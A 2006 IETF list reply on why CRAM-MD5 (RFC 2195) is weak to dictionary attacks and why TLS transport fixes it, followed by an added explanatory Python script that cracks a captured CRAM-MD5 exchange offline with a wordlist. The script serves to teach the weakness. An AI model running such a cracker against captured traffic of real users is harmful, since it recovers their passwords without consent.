RE: RFC 2195 (Was: what happened to newtrk?)

> From: Christian Huitema [mailto:huitema@xxxxxxxxxxxxxxxxxxxxx] 
> > From: Kurt D. Zeilenga [mailto:Kurt@xxxxxxxxxxxx]
> > At 04:07 PM 9/7/2006, John C Klensin wrote:
> > >I think we have a small misunderstanding here.  Let me say more
> > >clearly and briefly
> >
> > My message was intended to clarify why the SASL WG is pursuing an
> > Informational recommendation for its RFC2195bis work and to redirect
> > any comments specific to this work to the WG's list.
> 
> Well, if I remember correctly, there was ample discussion of 
> this topic during the IETF meeting in Paris -- both Steve 
> Bellovin and I presented the issues with such techniques. 
> Basic challenge response mechanisms like CRAM-MD5 are simply 
> too weak to be used on the Internet. They are subject to 
> dictionary attacks, which can retrieve the password in a very 
> short time. They don't deserve much more than documentation 
> for historical purpose.

HTTP-Digest was designed under the constraint that it had to be patent royalty free. At the time every form of public key cryptography, including Diffie-Hellman, was under patent.

They are only useful if you have a strong password.

Unfortunately the mechanisms for password exchange that are not subject to dictionary attacks are generally considered to be encumbered as well.

The solution to this particular problem is to use SSL as the transport. IMAP and POP both support this use. It is a trivial matter to discover that IMAPS is supported using an SRV record.

If the will is there this is all fixable.


	Phill
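The dictionary attack Huitema describes and the "only useful with a strong password" point Phill makes are easy to show concretely. The following is an added example written for this page, not code from any of the thread's participants: an eavesdropper who captured one CRAM-MD5 exchange (the clear-text challenge and the base64 client response) can test candidate passwords offline at HMAC-MD5 speed, with no further contact with the server. The exchange below is constructed with the username, password and challenge string that the RFC 2195 example uses; the wordlist is also constructed for the demonstration.

```python
import base64
import hashlib
import hmac


def cram_md5_response(username, password, challenge_b64):
    """Build the client's CRAM-MD5 response as RFC 2195 specifies:
    base64("<username> " + hex(HMAC-MD5(key=password, msg=challenge))).
    The challenge arrives base64-encoded on the wire; decode it first."""
    challenge = base64.b64decode(challenge_b64)
    digest = hmac.new(password.encode(), challenge, hashlib.md5).hexdigest()
    return base64.b64encode(f"{username} {digest}".encode()).decode()


def parse_response(response_b64):
    """Split a captured base64 client response into (username, hex digest)."""
    user, digest = base64.b64decode(response_b64).decode().rsplit(" ", 1)
    return user, digest


def crack_cram_md5(challenge_b64, response_b64, wordlist):
    """Offline dictionary attack on one captured exchange.

    The challenge is sent in clear and the response is a deterministic
    function of (password, challenge), so every candidate can be checked
    with one HMAC-MD5 and no interaction with the server. Returns the
    recovered password, or None if no candidate in the wordlist matches."""
    challenge = base64.b64decode(challenge_b64)
    _, target = parse_response(response_b64)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), challenge, hashlib.md5).hexdigest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


# Constructed sample exchange, using the RFC 2195 example values.
SERVER_CHALLENGE_B64 = base64.b64encode(
    b"<1896.697170952@postoffice.reston.mci.net>").decode()
CAPTURED_RESPONSE = cram_md5_response("tim", "tanstaaftanstaaf",
                                      SERVER_CHALLENGE_B64)

# Constructed wordlist; a real attack would use a multi-million-entry list.
WORDLIST = ["password", "123456", "letmein", "tim", "postoffice",
            "tanstaaftanstaaf", "qwerty"]


def demo():
    """Run the attack against the constructed capture."""
    return crack_cram_md5(SERVER_CHALLENGE_B64, CAPTURED_RESPONSE, WORDLIST)


if __name__ == "__main__":
    user, _ = parse_response(CAPTURED_RESPONSE)
    print(f"user {user!r}: recovered password {demo()!r}")
```

The loop body is one HMAC-MD5 per candidate, which is why a weak password falls in seconds and only a password outside any feasible wordlist survives; that is the whole of the "strong password" caveat. Running the same capture over TLS (IMAPS/POP3S) denies the attacker the challenge and response in the first place, which is the transport fix the message recommends.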

_______________________________________________

Ietf@xxxxxxxx
https://www1.ietf.org/mailman/listinfo/ietf